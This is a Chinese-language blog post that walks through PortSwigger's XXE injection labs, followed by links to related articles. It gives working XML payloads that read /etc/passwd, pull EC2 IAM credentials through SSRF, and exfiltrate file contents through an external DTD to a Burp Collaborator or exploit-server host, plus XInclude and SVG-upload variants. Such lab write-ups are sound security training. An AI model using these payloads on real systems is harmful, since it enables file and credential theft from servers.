PortSwigger-02-XXE

最新推荐文章于 2025-08-05 22:30:18 发布
最新推荐文章于 2025-08-05 22:30:18 发布
阅读量702 收藏 27
点赞数 20
CC 4.0 BY-SA版权
分类专栏: PortSwigger系列 文章标签: web3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73889365/article/details/148292616

一:漏洞原理

1、XXE

  • XXE全称xml外部实体注入

  • XML:是一种用于标记电子文件使其具有结构性的标记语言,提供统一的方法来描述和交换独立于应用程序或者供应商的结构化数据,它可以用来标记数据,定义数据类型、是一种允许用户对自己的标记语言进行定义的元语言

  • DTD:是一种描述XML数据结构的规则,可以包含实体定义,这些实体允许XML数据引入外部资源,如果文档中应用了DTD,解析器会尝试加载和解析DTD文件

  • 参考链接:https://blog.csdn.net/fuhanghang/article/details/123272261

2、XXE原理

XML外部实体注入是一种web安全漏洞,攻击者可以通过引入自定义的实体来强制服务器加载外部资源。它通常允许攻击者查看应用程序服务器文件系统上的文件,并于应用程序本身可以访问的任何后端或者外部数据进行交互。XXE漏洞触发点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可以上传恶意的xml文件读取文件或者获取shell.

3、XXE特征

1、url是 .ashx后缀
2、响应体是xml
3、看请求包中有一个Accept:看看其中有没有xml

二:PortSwigger靶场

靶场复现参考链接:https://blog.csdn.net/qq_53079406/article/details/128642758

1、利用外部实体检索文件

(1)原理:构造恶意的xml数据,引入外部实体,读取服务器的文件
(2)漏洞点
在这里插入图片描述
bp抓包分析:发现提交了xml数据:

  • <?xml version="1.0" encoding="UTF-8"?> 声明这是一个XML文档
  • 表示是根节点
  • 1 子节点:表示产品的标识号
<?xml version="1.0" encoding="UTF-8"?> 
<stockCheck>
    <productId>1</productId>
    <storeId>1</storeId>
</stockCheck>

构造payload读取文件

  • 外部实体定义 <!DOCTYPE>表示文档的类型
  • <!ENTITY xxe SYSTEM "file:///etc/passwd"> 定义一个外部的实体
  • xxe是实体的名称、SYSTEM:引入外部的资源 、file:///etc/passwd :表示文件的路径,表示需要读取的文件
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<stockCheck>
    <productId>&xxe;</productId>
    <storeId>1</storeId>
</stockCheck>

2、利用XXE执行SSRF攻击

(1)原理:引入外部实体恶意的xml代码读取远程服务器的敏感数据,使用<!ENTITY>定义外部实体,然后通过SYSTEM指向EC2元数据终端点,&xxe;就是将恶意的实体插入的XML数据的字段中

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin">
]>
<stockCheck>
    <productId>&xxe;</productId>
    <storeId>1</storeId>
</stockCheck>

在这里插入图片描述
成功读取到了敏感数据

3、具有带外交互的盲XXE

(1)原理:利用外带技术,也就是bp的Collaborator可以捕获请求和响应包

(2)和上述的情况有点类型,但是没有回显,需要利用外带技术,也就是bp的Collaborator,参考链接:

https://blog.csdn.net/wang_624/article/details/123172519

和问题2的情况有点类似,直接构造payload(其中http://8hqnvlwfu9tl88940w80p9w1zs5it7.burpcollaborator.net是bp生成的)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
  <!ENTITY xxe SYSTEM "http://8hqnvlwfu9tl88940w80p9w1zs5it7.burpcollaborator.net">
]>
<stockCheck>
    <productId>&xxe;</productId>
    <storeId>1</storeId>
</stockCheck>

成功外带看到相应包
在这里插入图片描述

4、通过 XML 参数实体进行带外交互的盲 XXE

(1)尝试使用例三中的payload进行测试,回显"Entities are not allowed for security reasons",可能是增加了一些过滤限制
(2)使用参数实体进行绕过:

  • 常规实体XML在正文中引用,而参数实体在只能在DTD内部用
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
  <!ENTITY % xxe SYSTEM "http://389f7odkpxhdbcf42849rsqcx33vrk.burpcollaborator.net">
  %xxe;
]>
<stockCheck>
    <productId>1</productId>
    <storeId>1</storeId>
</stockCheck>

5、利用盲XEE使用外部恶意DTD泄露数据

(1)目标:

  • 泄露服务器上的/etc/hostname文件的内容,使用Burp Collaborator 或实验室提供的漏洞利用服务器接收泄露的数据。
    (2)实现原理
  • 构造一个恶意的DTD文件:他会加载服务器的指定文件并通过外部网络发送到攻击者的服务器中(通过网络请求将数据外带)
  • 然后xxe注入访问我们上传的DTD文件让其执行然后将敏感数据带出到bp的服务器中
    (1)首先还是盲XML,需要利用外带技术
  • <!ENTITY % file SYSTEM "file:///etc/hostname"> :定义一个参数实体file,SYSTEM读取指定文件内容
  • 定义eval参数实体,
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://l5rx46a2mfev8ucmzq1roanuul0eo3.burpcollaborator.net/?x=%file;'>">
%eval;
%exfil;

https://exploit-0a5a0085035d308680ed8eba01a8007d.exploit-server.net/exploit

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0a5a0085035d308680ed8eba01a8007d.exploit-server.net/exploit"> %xxe;]>

成功外带拿到信息

6、利用盲XXE通过错误消息检索数据

原理:将恶意的DTD文件托管到VPS上,然后在xxe注入引入这个文件的链接来执行DTD中的代码
(1)请使用外部 DTD 触发显示文件内容的错误消息。/etc/passwd

DTD文件是一种定义XML文档结构的文件,主要用于执行XML文档的合法元素以及属性、子元素的排列顺序等规则

(2)上传恶意的DTD文件,然后获取恶意的DTD文件的url位置

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;

(3)xxe注入外带信息(参数实体)

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0ac3001e03dad7988092c570014c00a2.exploit-server.net/exploit"> %xxe;]>

在这里插入图片描述

7、利用XInclude检索文件

  • 相比于前面的实验,我们无法控制整个XML文档,因此无法定义DTD来启动经典的XXE攻击
    在这里插入图片描述
  • 但是可以使用XInclude/etc/passwd语句来注入
    XInclude是一种xml技术,用于在一个XML文档中动态插入其他XML文档或者文本内容。XInclude的工作机制是基于XML解析器的扩展支持,通过xi:include标签、可以引入外部数据并将其内容直接嵌入到XML文档中
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>

注入测试
在这里插入图片描述

8、通过图像文件上传利用XXE

(1)原理:一些应用程序允许用户上传图像、并在上传之后处理或者验证这些图像。如果支持上传SVG图像但是服务端没有对xml数据进行严格的校验的化,那么攻击者就可以提交恶意的SVG图像,从而达到XXE漏洞的隐藏攻击面
(2)创建 1.svg 其中内容包括如下

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

(3)在博客文章上发表评论,并将此图像作为头像上传,然后访问该图片就可以执行xml代码
在这里插入图片描述

Bp靶场portswigger-API
夜风的博客
03-05 670
关注公众号,回复免费获取大量视频及工具资源API。
JAVA XXE 从原理到利用
2401_83799022的博客
05-31 1184
在搜到的文章中有一个令人在意的点,作者提到“由于是java的站,所以利用ftp协议读取文件”,java站和ftp协议有什么关系?简单来说就是将我们原本使用的远程服务器上的dtd变更为了服务器上的本地dtd,去redefine其中的参数实体,再结合报错实现回显。和正常的XXE攻击其实没有太大区别,只是把payload放到了解压后里面的xml中,然后再压缩回到pptx/word/xlsx,上传后在解析过程中就会触发XXE payload。需要关注的是最后一种,参数实体,在实际的XXE攻击中会用到。
PortSwigger靶场(二)XXE注入
weixin_52835927的博客
10-19 419
XML是一种用于标记电子文件使其具有结构性的标记语言,提供统一的方法来描述和交换独立于应用程序或供应商的结构化数据它可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。用我自己的理解来讲就是我们输入数据其实计算机理解不了,需要我们再输入一些东西辅助计算机进行理解,标名这是什么数据,其实更像是一种数据库,只是功能上只能存数据,也更简单进行编写,方便计算机运用,xml就可以兼容几乎所有的数据,让计算机理解,具体参考本站中的这一篇文章。
burp靶场--XXE注入
qq_33168924的博客
01-16 1753
XML 外部实体注入(也称为 XXE)是一种 Web 安全漏洞,允许攻击者干扰应用程序对 XML 数据的处理。它通常允许攻击者查看应用程序服务器文件系统上的文件,并与应用程序本身可以访问的任何后端或外部系统进行交互。在某些情况下,攻击者可以利用 XXE 漏洞执行服务器端请求伪造(SSRF) 攻击,升级 XXE 攻击以危害底层服务器或其他后端基础设施。
PortSwigger XML外部实体注入(XXE
weixin_42451330的博客
11-21 1124
本文介绍PortSwigger靶场 XML外部实体注入(XXE),包括XXE漏洞产生原理、XXE漏洞利用方式、XXE漏洞防护措施。如有疑问欢迎私聊。
XXE漏洞利用技巧(由简入深)-----portswiggerXXE部分WP)
weixin_42075643的博客
09-01 644
XXE(XML External Entity:xml外部实体注入),它出现在使用XML解析器的应用程序中。XXE攻击利用了XML解析器的功能,允许应用程序从外部实体引用加载数据。攻击者可以通过构造恶意的XML实体引用来读取本地文件、执行远程请求或利用其他可用的外部实体来获取敏感信息。
XXE(外部实体注入)| PortSwigger(burpsuite官方靶场)| Part 3
bin789456的博客
03-07 1466
XInclude attacks 一些应用程序接收客户端提交的数据,在服务器端将其嵌入到 XML 文档中,然后解析该文档。当客户端提交的数据被放入后端 SOAP 请求中时,就会出现这种情况的一个示例,该请求随后由后端 SOAP 服务处理。 在这种情况下,您无法执行经典的 XXE 攻击,因为您无法控制整个 XML 文档,因此无法定义或修改DOCTYPE元素。但是,您也许可以XInclude改用。XInclude是 XML 规范的一部分,它允许从子文档构建 XML 文档。您可以XInclude在 XML
portswigger 靶场 xxe
02-28
### 关于Portswigger实验室中的XXE漏洞练习 在Portswigger Web Security Academy中,存在一系列针对不同类型的XML外部实体(XXE)注入攻击的实践环境。这些实验旨在帮助安全研究人员理解如何识别并利用应用程序处理不...
xxe-labs
04-02
2. **PortSwigger Web Security Academy**: PortSwigger提供了一个交互式的平台来练习各种Web安全漏洞,其中包括XXE漏洞的实践教程[^3]。 ```markdown https://portswigger.net/web-security/xxe ``` 3. **...
Lab: Exploiting XXE via image file upload :通过上传图片文件利用 XXE
Zeker62的博客
08-26 528
通过文件上传的 XXE 攻击 一些应用程序允许用户上传文件,然后在服务器端进行处理。一些常见的文件格式使用 XML 或包含 XML 子组件。基于 XML 的格式的示例是办公文档格式(如 DOCX)和图像格式(如 SVG)。 例如,应用程序可能允许用户上传图像,并在上传后在服务器上处理或验证这些图像。即使应用程序希望接收 PNG 或 JPEG 等格式,所使用的图像处理库也可能支持 SVG 图像。由...
【burpsuite安全练兵场-服务端10】XML外部实体注入(XXE注入)-9个实验(全)
01-11 8706
【BP靶场portswigger-服务端10-XML外部实体注入(XXE注入)】9个实验-万文详细步骤
XXE(外部实体注入)| PortSwigger(burpsuite官方靶场)| Part 1
bin789456的博客
02-25 5444
写在前面 这个系列开始写写XXE相关的东西,这里时第一部分,相关资料及使用靶场如下: https://www.w3schools.com/xml/ https://portswigger.net/web-security/xxe 为了更方便你检索题目且由于是国外网站,会带有一定外语及翻译,开始吧 Exploiting XXE using external entities to retrieve files(利用外部实体利用XXE来检索文件) 打开环境 是一个商店页面的模拟,先找找可疑的点吧,点进商品
PortSwigger Academy | XML external entity (XXE) injection : XML外部实体注入
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
02-01 1629
文章目录什么是XML外部实体注入?XXE漏洞如何产生?XML实体什么是XML?什么是XML实体?什么是文件类型定义?什么是XML自定义实体?什么是XML外部实体?XXE攻击有哪些类型? 在本节中,我们将解释什么是XML外部实体注入,描述一些常见的示例,解释如何发现和利用各种XXE注入,并总结如何防止XXE注入攻击。 什么是XML外部实体注入? XML外部实体注入(也称为XXE)是一个网络安全漏洞,它使攻击者能够干扰应用程序对XML数据的处理。 它通常使攻击者可以查看应用程序服务器文件系统上的文件,并与应用程
BurpWeb安全学院之XXE
lonmar的博客
08-06 1263
文章目录XXE漏洞如何产生利用XXE读取文件利用XXE执行SSRF攻击XXE盲注检测Burp Collaborator测试XXE盲注外部实体参数被过滤XXE盲注利用XXE报错注入利用本地DTD的XXE盲注 实验室链接https://portswigger.net/web-security XXE漏洞如何产生 一些应用程序使用XML格式在浏览器和服务器之间传输数据.而服务器端又没有对XML数据进行很好的检查,就可能产生XXE漏洞. 如: 某个网页可能传输如下的数据 如果稍加修改: 利用XXE读取文件 要执
XXE(外部实体注入)| PortSwigger(burpsuite官方靶场)| Part 2
bin789456的博客
03-03 758
Blind XXE with out-of-band interaction via XML parameter entities(通过 XML 参数实体进行带外交互的盲 XXE
Web3.0如何塑造互联网的未来
weixin_44672358的博客
08-01 303
Web3.0不仅仅是技术的升级,它代表了一种全新的互联网理念和模式。通过去中心化、用户主权、智能化、互操作性和新的经济模型,Web3.0有望为用户带来更加安全、私密、智能和互联的网络体验。随着技术的不断进步和应用的广泛推广,Web3.0将深刻地塑造互联网的未来,让我们共同期待一个更加开放、智能和可持续的互联网世界。
LOOP Finance:一场 Web3 共和国中的金融制度实验
最新发布
Joker456123的博客
08-05 112
通过生态机制,LOOP要求每位参与者添加一定比例的流动性,作为投资门槛。这不仅稳定了代币价格,也增强了专案的抗风险与流动性,使LOOP成为低风险、高流动性的DEFI资产。LOOP Finance 并不依赖外部资金推动币价,而是靠内部机制设计,将每一轮参与者的行为转化为代币价值的增长力量。它以凯因斯经济学为启发,设计出一套长期、安全、稳定收益的全新DEFI玩法,兼顾稳健利息回报与DEFI高速成长的潜力。1. 投资使用 LOOP,自动销毁 → 减少流通。越多人参与,销毁越多,循环越快,币值越高。
Web3合约ABI,合约地址生成部署调用及创建,连接钱包,基础交易流程
weixin_43883615的博客
08-03 843
本文介绍了Web3合约开发与交互的完整流程,包括使用Remix IDE生成合约ABI和地址、合约部署与验证,以及前端调用合约方法的实现。主要内容涵盖:1)通过Remix编写Solidity合约并获取ABI;2)合约部署及在Etherscan上的验证流程;3)前端集成MetaMask钱包与合约交互的代码示例;4)Web3基础操作如查询区块号、Gas价格等。文章提供了详细的操作截图和完整代码示例,展示了从合约开发到前端集成的全链路实现过程,帮助开发者快速掌握Web3智能合约开发的核心流程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

巅峰赛2000分以下是巅峰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值